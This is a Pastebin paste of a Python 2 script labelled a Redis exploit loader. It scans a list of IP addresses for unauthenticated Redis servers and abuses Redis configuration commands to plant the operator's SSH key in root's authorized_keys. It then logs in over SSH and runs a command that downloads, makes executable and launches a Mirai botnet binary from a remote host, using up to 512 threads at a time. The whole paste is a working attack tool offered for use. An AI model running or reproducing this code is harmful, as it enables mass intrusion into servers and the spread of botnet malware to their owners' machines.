Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- # redis exploit loader modified by Freak
- # must type ssh-keygen -t rsa -C \"acid_creative\" as root to generate key to hijack redis
- # phat hax enjoy
- import random
- import socket
- import threading
- import socket
- import sys
- import paramiko
- import time
- procIP = []
- suc = 0
- command_to_send = \
- 'cd /tmp; wget http://0.0.0.0/bins/mirai.x86 -O || curl http://0.0.0.0/bins/mirai.x86 -O; chmod 777 mirai.x86; ./mirai.x86'
- def getLinesList(fileLoc):
- buf = []
- with file(fileLoc, 'r') as f:
- for line in f:
- buf.append(line)
- return buf
- def writeSuc(file_name, content):
- try:
- if content not in file(file_name, 'r'):
- with file(file_name, 'a+') as f:
- f.write(content)
- except Exception, e:
- pass
- def main():
- if len(sys.argv) < 3:
- sys.exit('Usage: <ip_list> <ip_output_file>\n')
- global running
- running = 0
- def worker(ipOutput, keyFile, ip):
- try:
- global running
- running += 1
- global suc
- global procIP
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
- sock.setblocking(False)
- sock.settimeout(3)
- sock.connect((ip, 6379))
- sock.settimeout(None)
- sock.send('config set dir /root/.ssh/\n')
- buf = sock.recv(4)
- if buf.strip() == '+OK':
- print '[+] Good IP ' + ip
- sock.send('set qwe "\\n\\n' + keyFile
- + '''\\n\\n\\n"
- config set dbfilename "authorized_keys"
- save
- ''')
- file_h = open('good.txt', 'a')
- file_h.write(ip + '\n')
- file_h.close()
- suc += 1
- sock.close() # ssh auto infector
- ssh_port = 22
- user = 'root'
- ssh = paramiko.Transport((ip, ssh_port))
- auth_key = \
- paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa'
- )
- ssh.connect(username=user, pkey=auth_key)
- session = ssh.open_channel()
- session.exec_command(command_to_send)
- time.sleep(10)
- ssh.close()
- else:
- sock.close()
- print '[%s/%s] Bad IP --> %s' % (str(suc),
- str(len(ipList)), ip)
- except Exception, e:
- print "[%s/%s] Bad IP (can't connect at all) --> %s" \
- % (str(suc), str(len(ipList)), ip)
- except Exception, e:
- print e
- running -= 1
- ipList = getLinesList(sys.argv[1])
- ipOutput = sys.argv[2]
- keyFile = file('/root/.ssh/id_rsa.pub', 'r').read().strip()
- threads = []
- for ip in ipList:
- t = threading.Thread(target=worker, args=(ipOutput, keyFile, ip))
- threads.append(t)
- for x in threads:
- while running > 512:
- time.sleep(1)
- x.start()
- for x in threads:
- x.join()
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement